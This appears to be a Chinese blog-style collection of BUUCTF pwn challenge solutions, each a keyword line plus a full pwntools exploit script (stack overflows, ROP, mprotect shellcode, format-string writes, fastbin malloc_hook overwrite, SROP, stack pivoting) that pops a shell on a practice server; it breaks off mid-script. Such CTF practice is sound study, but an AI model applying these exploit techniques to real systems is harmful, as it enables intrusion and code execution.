get_started_3dsctf_2016

关键词:ROP链、栈溢出、mprotect()函数

可参考文章(优质): https://www.cnblogs.com/lyxf/p/12113401.html

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#context.arch = 'i386'
elf = ELF('./get_started_3dsctf_2016')
catflag = 0x080489B8
pop3_addr = 0x080509a5
main_addr = 0x08048A20
# mprotect_addr = 0x0806EC80
mprotect_addr = elf.sym['mprotect']
read_addr = elf.sym['read']
write_got_plt = 0x080EB000
bss_addr = 0x080ea000 sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
# start_addr = write_got_plt
start_addr = bss_addr
addr_len = 0x1000
prot_rwx = 0x4+0x2+0x1 if debug == 1:
sh = process('./get_started_3dsctf_2016')
else:
sh = remote(ip,port)
# payload = 'a'*0x38 + p32(catflag)
# sh.sendline(payload)
payload = ''
payload +='a'*0x38 + p32(mprotect_addr)
payload += p32(pop3_addr) + p32(start_addr) + p32(addr_len) + p32(prot_rwx)
payload += p32(read_addr) + p32(pop3_addr) + p32(0) + p32(start_addr) + p32(0x100)
payload += p32(start_addr)
sh.sendline(payload)
shellcode = asm(shellcraft.sh(),arch = 'i386',os = 'linux')
sh.sendline(shellcode)
sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',26297,0)

[第五空间2019 决赛]PWN5

关键词:格式化字符串漏洞

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./pwn')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./pwn')
else:
sh = remote(ip,port)
unk_804C044_addr = 0x0804C044
'''
system_addr = 0x08049080
read_addr = elf.got['read']
atoi_addr = elf.got['atoi']
offset = 10
sh.recvuntil('name:')
payload1 = fmtstr_payload(offset,{atoi_addr,system_addr})
sh.sendline(payload1)
sh.recvuntil('passwd:')
sh.sendline('/bin/sh\x00')
'''
payload2 = p32(unk_804C044_addr) + '%10$n'
sh.recvuntil('name:')
sh.sendline(payload2)
sh.recvuntil('passwd:')
sh.sendline(str(0x00000004)) sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',28821,0)

[BJDCTF 2nd]r2t3

关键词:整数溢出、栈溢出

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./r2t3')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./r2t3')
else:
sh = remote(ip,port)
system_addr = 0x0804858B
payload = ('a'*0x11 + 'a'*0x4 +p32(system_addr)).ljust(260,'a')
sh.recvuntil('name:\n')
sh.sendline(payload)
sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',28216,0)

ciscn_2019_n_8

关键词:栈溢出

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./ciscn_2019_n_8')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./ciscn_2019_n_8')
else:
sh = remote(ip,port)
sh.recvuntil('name?')
sh.sendline('a'*13*4 + p64(0x11)+'bbbb')
sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',29708,0)

not_the_same_3dsctf_2016

关键词:栈溢出、ROP链、mprotect

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'i386'
elf = ELF('./not_the_same_3dsctf_2016')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./not_the_same_3dsctf_2016')
else:
sh = remote(ip,port) pop3_addr = 0x0809e3e5
# flag_addr = 0x080489A0
read_addr = elf.sym['read']
mprotect_addr = elf.sym['mprotect']
start_addr = 0x080ea000
addr_len = 0x1000
addr_rwx = 0x7
bss_addr = 0x080EBF80
# main_addr = elf.sym['main'] payload = 'a'*0x2D + p32(mprotect_addr)
payload += p32(pop3_addr) + p32(start_addr) + p32(addr_len) + p32(addr_rwx)
payload += p32(read_addr) + p32(pop3_addr) + p32(0) + p32(start_addr) + p32(0x200)
payload += p32(start_addr)
sh.sendline(payload)
shellcode = asm(shellcraft.sh(),arch = 'i386',os = 'linux')
sh.sendline(shellcode) sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',25323,0)

jarvisoj_level0

关键词:栈溢出

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./level0')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./level0')
else:
sh = remote(ip,port)
system_addr = 0x0000000000400596
payload = 'A'*0x88 + p64(system_addr)
sh.sendline(payload)
sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',27804,0)

[BJDCTF 2nd]one_gadget

关键词:libc链接、one_gadget

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./one_gadget')
libc = ELF('./libc-2.29.so')
sh = 0
def pwn(ip,port,debug):
global sh
global libc
if debug == 1:
sh = process('./one_gadget')
else:
sh = remote(ip,port)
sh.recvuntil('0x')
printf_addr = int(sh.recvn(12),16)
print '-----printf_addr = ' + hex(printf_addr)
libc_base = printf_addr - libc.sym['printf']
one_gadget_addr = 0x106ef8
system_addr = libc_base + one_gadget_addr
sh.recvuntil('gadget:')
sh.sendline(str(system_addr))
sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',29133,0)

[HarekazeCTF2019]baby_rop

关键词:栈溢出、ROP链

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
# context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./babyrop')
#libc = ELF('./')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./babyrop')
else:
sh = remote(ip,port)
bin_sh_addr = 0x0000000000601048
system_addr = 0x0000000000400490
pop_rdi_addr = 0x0000000000400683
offset = 0x10
payload = 'a'*(offset+8) + p64(pop_rdi_addr) + p64(bin_sh_addr) + p64(system_addr) + p64(0x00000000004005D6)
sh.sendlineafter('name?',payload)
sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',29851,0)

jarvisoj_level2

关键词:栈溢出

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'i386'
elf = ELF('./level2')
#libc = ELF('./')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./level2')
else:
sh = remote(ip,port)
system_addr = 0x08048320
bin_sh_addr = 0x804A024
offset = 0x88
payload = 'a'*(offset+4) + p32(system_addr) + p32(0x0804849E) + p32(bin_sh_addr)
sh.sendlineafter('Input:\n',payload)
sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',25952,0)

babyheap_0ctf_2017

关键词:fastbin attack、malloc_hook函数改写

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./babyheap_0ctf_2017')
libc = ELF('./libc-2.23.so')
sh = 0
lib = 0 def offset_bin_main_arena(idx):
word_bytes = context.word_size / 8
offset = 4 # lock
offset += 4 # flags
offset += word_bytes * 10 # offset fastbin
offset += word_bytes * 2 # top,last_remainder
offset += idx * 2 * word_bytes # idx
offset -= word_bytes * 2 # bin overlap
return offset offset_unsortedbin_main_arena = offset_bin_main_arena(0) def allocate(size):
sh.recvuntil('Command: ')
sh.sendline('1')
sh.recvuntil('Size: ')
sh.sendline(str(size)) def fill(idx,content):
sh.recvuntil('Command: ')
sh.sendline('2')
sh.recvuntil('Index: ')
sh.sendline(str(idx))
sh.recvuntil('Size: ')
sh.sendline(str(len(content)))
sh.recvuntil('Content: ')
sh.send(content) def free(idx):
sh.recvuntil('Command: ')
sh.sendline('3')
sh.recvuntil('Index: ')
sh.sendline(str(idx)) def dump(idx):
sh.recvuntil('Command: ')
sh.sendline('4')
sh.recvuntil('Index: ')
sh.sendline(str(idx))
#sh.recvline()
# return p.recvline() def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./babyheap_0ctf_2017')
else:
sh = remote(ip,port)
allocate(0x10)#0
allocate(0x10)#1
allocate(0x10)#2
allocate(0x10)#3
allocate(0x80)#4
free(2)
free(1)
payload1 = 0x10*'a' + p64(0) + p64(0x21) + p8(0x80)
fill(0,payload1)
payload2 = 0x10*'b' + p64(0) + p64(0x21)
fill(3,payload2)
allocate(0x10) #5--1
allocate(0x10) #6--2
payload3 = 'c' * 0x10 + p64(0) + p64(0x91)
fill(3,payload3)
allocate(0x80) #7--4
free(4)
dump(2)
sh.recvuntil('Content: \n')
unsortedbin_addr = u64(sh.recv(8).strip().ljust(8,'\x00'))
print 'unsortedbin_addr =' + hex(unsortedbin_addr)
print 'offset_unsortedbin_main_arena = ' + hex(offset_unsortedbin_main_arena)
main_arena = unsortedbin_addr - offset_unsortedbin_main_arena
log.success('main arena addr: ' + hex(main_arena))
main_arena_offset = 0x3c4b20
libcbase = main_arena - main_arena_offset
log.success('libcbase = ' + hex(libcbase))
allocate(0x60)#8--4
free(4)
fake_chunk_addr = main_arena - 0x33
print 'fake_chunk_addr = ' + hex(fake_chunk_addr)
fake_chunk = p64(fake_chunk_addr)
fill(2,fake_chunk)
allocate(0x60) #9 --4
allocate(0x60) #10 --6
malloc_hook_offset =0x0000000003c4b10
fake_chunk_offset = 0x3c4b20 one_gadget_addr = libcbase + 0x4526a
print ' one_gadget_addr = ' + hex(one_gadget_addr) payload4 = 0x13*'d' + p64(one_gadget_addr)
fill(6,payload4)
allocate(0x100)
sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',26418,0)
# pwn('127.0.0.1',10001,0)

bjdctf_2020_babystack

关键词:栈溢出

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
# context.arch = 'i386'
elf = ELF('./bjdctf_2020_babystack')
#libc = ELF('./bjdctf_2020_babystack')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./bjdctf_2020_babystack')
else:
sh = remote(ip,port)
#gdb.attach(sh)
system_binsh_addr = 0x0000000004006E6
offset = 0x10
payload = offset * 'a' + 'a'*8 + p64(system_binsh_addr)
sh.recvuntil(':\n')
sh.sendline('100')
sh.recvuntil('name?\n')
sh.sendline(payload)
sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',25168,0)

ciscn_2019_s_3

关键词:asm程序、ROP链、SROP链、通用gadget、系统调用59( sys_execve )、系统调用15( sys_rt_sigreturn )、SigreturnFrame的使用

way1:SROP、csu、sys_execve

from pwn import *

p = process('./ciscn_s_3')
elf = ELF('./ciscn_s_3')
context.log_level = 'debug' main_addr = elf.symbols['main']
csu_end = 0x040059A
csu_front = 0x0400580
ret_addr = 0x004003a9
rax_59_ret = 0x04004E2
syscall = 0x400501 #gdb.attach(p,'b *0x00400589')
payload = '/bin/sh\x00' + 'A'*0x8 + p64(main_addr)
p.sendline(payload)
p.recv(0x20)
stack_addr = u64(p.recv(8))
print 'stack_addr-->' + hex(stack_addr) binsh_addr = stack_addr - 0x138
rax_59 = binsh_addr + 0x10
pop_rdi = 0x04005a3 payload = '/bin/sh\x00' + 'A'*0x8 + p64(rax_59_ret) + p64(csu_end)
payload += p64(0) + p64(1) + p64(rax_59) + p64(0) + p64(0) + p64(0)
payload += p64(csu_front)
payload += 'a'*0x38
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(syscall)
p.sendline(payload)
p.interactive()
#pause()

way2:ROP、sigreturn

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
# context.arch = 'i386'
elf = ELF('./ciscn_s_3')
#libc = ELF('./')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./ciscn_s_3')
else:
sh = remote(ip,port)
main_addr = 0x00000000040051D
sigret = 0x0000000004004DA
syscall = 0x000000000400517 main=0x0004004ED
sigret=0x4004DA
sys=0x400517 pl1='/bin/sh\x00'*2+p64(main)
sh.send(pl1)
sh.recv(0x20)
sh1=u64(sh.recv(8))-280
print(hex(sh1)) frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = sh1
frame.rsi = 0
frame.rdx = 0
frame.rip = sys pl1='a'*16+p64(sigret)+p64(sys)+str(frame) '''
def debug(addr):
raw_input('debug:')
gdb.attach(sh, "b *" + addr)
debug('0x400514')
''' pl2='/bin/sh\x00'*2+p64(sigret)+p64(sys)+str(frame)
sh.send(pl2) sh.interactive() #gdb.attach(sh)
sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',26048,1)
#pwn('127.0.0.1',10001,0)

jarvisoj_level2_x64

关键词:64位栈溢出

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'i386'
elf = ELF('./level2_x64')
#libc = ELF('./')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./level2_x64')
else:
sh = remote(ip,port)
system_addr = 0x0000000004004C0
bin_sh_addr = 0x000000000600A90
pop_rdi = 0x00000000004006b3
offset = 0x80
payload = 'a'*(offset+8) + p64(pop_rdi)+ p64(bin_sh_addr) + p64(system_addr)
sh.sendlineafter('Input:\n',payload)
sh.interactive() if __name__ == '__main__':
pwn('node3.buuoj.cn',27698,1)

ciscn_2019_n_5

关键词:shellcraft.sh()、.bass段写入、栈溢出

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
# context.arch = 'i386'
elf = ELF('./ciscn_2019_n_5')
#libc = ELF('./') ip = 'node3.buuoj.cn'
port = 27695
debug = 0 if debug == 1:
p = process('./ciscn_2019_n_5')
else:
p = remote(ip,port) sh = asm(shellcraft.sh())
sh_addr = 0x000000000601080 payload = 'a'*0x28
payload += p64(sh_addr) p.recvuntil('name\n')
p.sendline(sh)
p.recvuntil('me?\n')
p.send(payload)
p.interactive()

[HarekazeCTF2019]baby_rop2

关键词:ROP链、LibcSearcher(无libc)、printf函数泄露read地址

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
# context.arch = 'i386'
elf = ELF('./babyrop2')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 29490
debug = 0 if debug == 1:
p = process('./babyrop2')
else:
p = remote(ip,port) read_got = elf.got['read']
read_plt = elf.plt['read']
printf_got = elf.got['printf']
printf_plt = elf.sym['printf'] main_addr = elf.sym['main']
pop_rdi = 0x0000000000400733
pop3_ret = 0x000000000040072e
pop_rsi_r15 = 0x0000000000400731
fmt_addr = 0x000000000400770 payload = 'a'*0x20+'b'*0x8
payload += flat([pop_rdi,fmt_addr,pop_rsi_r15,read_got,0,printf_plt,main_addr]) p.recvuntil('name?')
p.send(payload) read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print 'read_addr = ',hex(read_addr)
libc = LibcSearcher('read',read_addr) libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh') payload = 'a'*0x28
payload += flat([pop_rdi,bin_sh_addr,system_addr]) p.recvuntil('name?')
p.send(payload) #gdb.attach(p)
p.interactive()

ciscn_2019_ne_5

关键词:32位栈溢出、system('sh')

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./ciscn_2019_ne_5')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 25731
debug = 0 if debug == 1:
p = process('./ciscn_2019_ne_5')
else:
p = remote(ip,port) bin_addr = 0x080482ea
system_addr = elf.sym['system'] payload = (0x48+0x4)*'a' + p32(system_addr) + p32(0xdeadbeef) + p32(bin_addr) p.recvuntil('password:')
p.sendline('administrator')
p.recvuntil('Exit\n:')
p.sendline('1')
p.recvuntil('info:')
p.sendline(payload)
p.recvuntil('Exit\n:')
p.sendline('4')
#gdb.attach(p)
p.interactive()

pwn2_sctf_2016

关键词:无符号整型溢出、LibcSearcher、printf函数打印地址、打本地失败、打远程成功

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./pwn2_sctf_2016')
# libc = ELF('./libc') ip = 'node3.buuoj.cn'
port = 27942
debug = 0 if debug == 1:
p = process('./pwn2_sctf_2016')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) int_0x80 = 0x80484CD
printf_plt = elf.sym['printf']
start_addr = 0x80483D0
main_got = elf.got['__libc_start_main']
main_plt = elf.sym['__libc_start_main']
print 'main_pkt =',hex(main_plt) payload = 'a'*(0x2c+4) +p32(printf_plt) + p32(start_addr) + p32(0x80486F8) + p32(main_got) # payload = 'a'*(0x2c+4) + p32(system_addr) + p32(0xdeadbeef) + p32(bin_sh_addr)
# gdb.attach(p)
# raw_input() p.recvuntil('read?')
p.sendline('-12')
p.recvuntil('data!\n')
p.sendline(payload)
# addr = u32(p.recv()[-8:])
p.recvline()
p.recvuntil('said: ')
main_addr = u32(p.recv(4))
print 'main_addr = ' , hex(main_addr) libc = LibcSearcher('__libc_start_main',main_addr)
libcbase = main_addr - libc.dump('__libc_start_main') system_addr = libcbase + libc.dump('system')
bin_sh_addr = libcbase + libc.dump('str_bin_sh')
log.success("libcbase:" + hex(libcbase))
log.success("system_addr:" + hex(system_addr))
log.success("bin_sh_addr:" + hex(bin_sh_addr)) payload2 = 'a'*(0x2c+4) + p32(system_addr) + p32(start_addr) + p32(bin_sh_addr) p.recvuntil('read?')
p.sendline('-12')
p.recvuntil('data!\n')
p.sendline(payload2) p.interactive()

ez_pz_hackover_2016

关键词:给出一个栈地址、动态调试找出栈偏移、\x00截断、shellcraft.sh()、溢出

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
# context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./ez_pz_hackover_2016')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 28566
debug = 0 if debug == 1:
p = process('./ez_pz_hackover_2016')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) p.recvuntil('crash: ')
stackaddr = int(p.recv(10),16)
print '-------------------'
print hex(stackaddr)
print '-------------------'
p.recv() shellcode = asm(shellcraft.sh())
addr = stackaddr - 0x18-4 # gdb.attach(p,'b *0x08048600') payload = 'crashme\x00' #+ 'aaaaaaaaaaaaaa'
payload = payload.ljust(0x16,'a')
payload += 'bbbb' + p32(addr) + shellcode p.sendline(payload)
print p.recv()
# raw_input()
#gdb.attach(p)
p.interactive()

铁人三项(第五赛区)_2018_rop

关键词:ROP、32位DynELF、栈溢出

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
# context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./2018_rop')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 28506
debug = 0 if debug == 1:
p = process('./2018_rop')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) start_addr = 0x80483C0
read_plt = elf.sym['read']
read_got = elf.got['read']
write_plt = elf.sym['write']
write_got = elf.got['write']
main_addr = elf.sym['main'] bss_addr = elf.sym['__bss_start']
can_write_addr = 0x804A020 def leak(address):
count = 0
data = ''
payload = 'a'*0x88 + 'bbbb' + p32(write_plt) +p32(start_addr) + p32(0x1) + p32(address) + p32(4)
p.sendline(payload)
data = p.recv(4)
log.debug("%#x => %s" % (address, (data or '').encode('hex'))) #打印搜索的信息
return data
d = DynELF(leak,elf=elf)
systemAddress = d.lookup('system', 'libc') #在libc文件中搜索system函数的地址
print "systemAddress:" + hex(systemAddress) print '-------------------------write "/bin/sh"-------------'
payload1 = 'a'*0x88 + 'bbbb' + p32(read_plt) + p32(start_addr) + p32(0) + p32(bss_addr)+ p32(8)
p.sendline(payload1)
p.sendline('/bin/sh') print '-------------------------get shell-------------------'
payload2 = 'a'*0x88 + 'bbbb' + p32(systemAddress) + p32(start_addr) + p32(bss_addr)
p.sendline(payload2)
#gdb.attach(p)
p.interactive()

关键词:ROP、LibcSearcher()、栈溢出

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./2018_rop')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 28506
debug = 0 if debug == 1:
p = process('./2018_rop')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) start_addr = 0x80483C0
read_plt = elf.sym['read']
read_got = elf.got['read']
write_plt = elf.sym['write']
write_got = elf.got['write']
main_addr = elf.sym['main'] bss_addr = elf.sym['__bss_start']
can_write_addr = 0x804A020 payload = 'a'*0x88 + 'bbbb' + p32(write_plt) + p32(start_addr) + p32(1) + p32(read_got)+ p32(4) p.sendline(payload)
read_addr = u32(p.recv(4))
print 'read_addr =',hex(read_addr) libc = LibcSearcher('read',read_addr)
libcbase = read_addr - libc.dump('read')
systemAddress = libcbase + libc.dump('system')
bin_sh_addr = libcbase + libc.dump('str_bin_sh')
print 'libcbase = ',hex(libcbase)
print 'systemAddress = ',hex(systemAddress)
print 'bin_sh_addr = ',hex(bin_sh_addr) print '-------------------------get shell-------------------'
payload2 = 'a'*0x88 + 'bbbb' + p32(systemAddress) + p32(start_addr) + p32(bin_sh_addr)
p.sendline(payload2)
#gdb.attach(p)
p.interactive()

[Black Watch 入群题]PWN

关键词:栈迁移、LibcSearcher(write地址)

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
context.log_level = 'debug'
# context.arch = 'amd64'
context.arch = 'i386'
elf = ELF('./spwn')
libc = ELF('./libc') ip = 'node3.buuoj.cn'
port = 26048
debug = 1 if debug == 1:
p = process('./spwn')
else:
p = remote(ip,port) puts_got = elf.got['puts']
puts_plt = elf.sym['puts']
read_got = elf.got['read']
read_plt = elf.sym['read']
write_plt = elf.sym['write']
write_got = elf.got['write']
puts_addr = 0x8048350 execve_offset = 0x3a80c
pop_ebp = 0x080485ab
main_addr = elf.sym['main']
leave_ret = 0x08048511
bss_addr = 0x0804A300 payload = p32(write_plt) + p32(main_addr) + p32(1)+ p32(write_got) + p32(4)
payload2 = flat(['a'*0x18,bss_addr-4,leave_ret]) p.recvuntil('name?')
p.send(payload)
p.recvuntil('say?')
p.send(payload2) write_addr = u32(p.recv(4))
print 'write_addr = ',hex(write_addr)
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
bin_sh_addr= libc_base + libc.dump('str_bin_sh') payload3 = flat([system_addr,main_addr,bin_sh_addr]) p.recvuntil('name?')
p.sendline(payload3)
p.recvuntil('say?')
p.send(payload2) #gdb.attach(p)
p.interactive()

ciscn_2019_es_2

关键词:栈迁移(双read、一printf。溢出空间0x8字节、打印ebp、栈迁移到栈空间,执行system)

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./ciscn_2019_es_2')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 26048
debug = 1 if debug == 1:
p = process('./ciscn_2019_es_2')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) hack_addr = 0x8048400
# start_addr = 0x8048450
leave_addr = 0x8048593 payload = 'a'*0x24 + 'bbbb' p.recv()
p.send(payload)
p.recvuntil('bbbb')
ebp_addr = u32(p.recv(4))
ret_addr = u32(p.recv(4)) print hex(ebp_addr)
print hex(ret_addr) payload2 ='dddd'+ p32(hack_addr) + p32(0x12345678) + p32(ebp_addr - 0x28) + '/bin/sh\x00'
payload2 = payload2.ljust(0x28,'c')
payload2 += p32(ebp_addr-0x38) + p32(leave_addr) p.send(payload2)
p.interactive()

[BJDCTF 2nd]test

关键词:c语言system(x86_64)、x86_64提权、提权、关键单词过滤

#源码:
#include <stdio.h>
#include <string.h>
#include <stdlib.h> int main(){
char cmd[0x100] = {0};
puts("Welcome to Pwn-Game by TaQini.");
puts("Your ID:");
system("id");
printf("$ ");
gets(cmd);
if( strstr(cmd, "n")
||strstr(cmd, "e")
||strstr(cmd, "p")
||strstr(cmd, "b")
||strstr(cmd, "u")
||strstr(cmd, "s")
||strstr(cmd, "h")
||strstr(cmd, "i")
||strstr(cmd, "f")
||strstr(cmd, "l")
||strstr(cmd, "a")
||strstr(cmd, "g")
||strstr(cmd, "|")
||strstr(cmd, "/")
||strstr(cmd, "$")
||strstr(cmd, "`")
||strstr(cmd, "-")
||strstr(cmd, "<")
||strstr(cmd, ">")
||strstr(cmd, ".")){
exit(0);
}else{
system(cmd);
}
return 0;
}
提权命令:x86_64

bjdctf_2020_babyrop

关键词:ROP

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
# context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./bjdctf_2020_babyrop')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 29516
debug = 0 if debug == 1:
p = process('./bjdctf_2020_babyrop')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) pop_rdi = 0x0000000000400733
offset = 32
start_addr = 0x000000000400530
main_addr = 0x4006ad
read_got = elf.got['read']
read_plt = elf.sym['read']
puts_got = elf.got['puts']
puts_plt = elf.sym['puts']
pop3_ret = 0x000000000040072e # gdb.attach(p,'b *0x00000000040067E') payload = offset *'a' + 'b'*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.recv() p.sendline(payload)
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(puts_addr)
# read_addr = u64(p.recv(6).ljust(8,'\x00'))
# print hex(read_addr) # libc = LibcSearcher('read',read_addr)
# libcbase = read_addr - libc.dump('read')
libc = LibcSearcher('puts',puts_addr)
libcbase = puts_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')
bin_sh_addr = libcbase + libc.dump('str_bin_sh')
print '----------libcbase = ',hex(libcbase)
print '----------system_addr = ',hex(system_addr)
print '----------bin_sh_addr = ',hex(bin_sh_addr) payload2 = offset * 'a' + 'b'*8 + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)
p.recv()
p.sendline(payload2) #gdb.attach(p)
p.interactive()

jarvisoj_level3

关键词:栈溢出、bss段地址写入'/bin/sh'

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
# context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./level3')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 27623
debug = 0 if debug == 1:
p = process('./level3')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) read_got = elf.got['read']
read_plt = elf.sym['read']
write_got = elf.got['write']
write_plt = elf.sym['write']
offset = 136
main_addr = elf.sym['main']
start_addr = 0x8048350
data_addr = 0x804A022
leave_ret = 0x8048482 payload = offset * 'a' + 'bbbb' + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4) p.recv()
p.sendline(payload)
write_addr = u32(p.recv(4))
print '---------write_addr = ',hex(write_addr) libc = LibcSearcher('write',write_addr)
libc_base =write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh') #no str_bin_sh payload1 = offset * 'a' + 'bbbb' + p32(read_plt) + p32(start_addr) + p32(0) + p32(data_addr) + p32(8) p.recv()
p.sendline(payload1)
p.sendline('/bin/sh') payload2 = offset * 'a' + 'bbbb' + p32(system_addr) + p32(main_addr) + p32(data_addr)
print p.recv()
p.sendline(payload2) p.interactive()

[BJDCTF 2nd]r2t4

关键词:64位格式化字符串漏洞(有6个参数存在寄存器中)

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
elf = ELF('./r2t4')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 29997
debug = 0 if debug == 1:
p = process('./r2t4')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) back_door = 0x000000000400626
read_got = elf.got['read']
stack_chk_fail = elf.got['__stack_chk_fail'] offset = 2+6 payload = '%64c%9$hn%1510c%10$hnaaa'+p64(stack_chk_fail+2) + p64(stack_chk_fail) p.sendline(payload) #gdb.attach(p)
p.interactive()

hitcontraining_uaf

关键词:uaf、堆溢出

#!python
#coding:utf-8 from pwn import *
import binascii
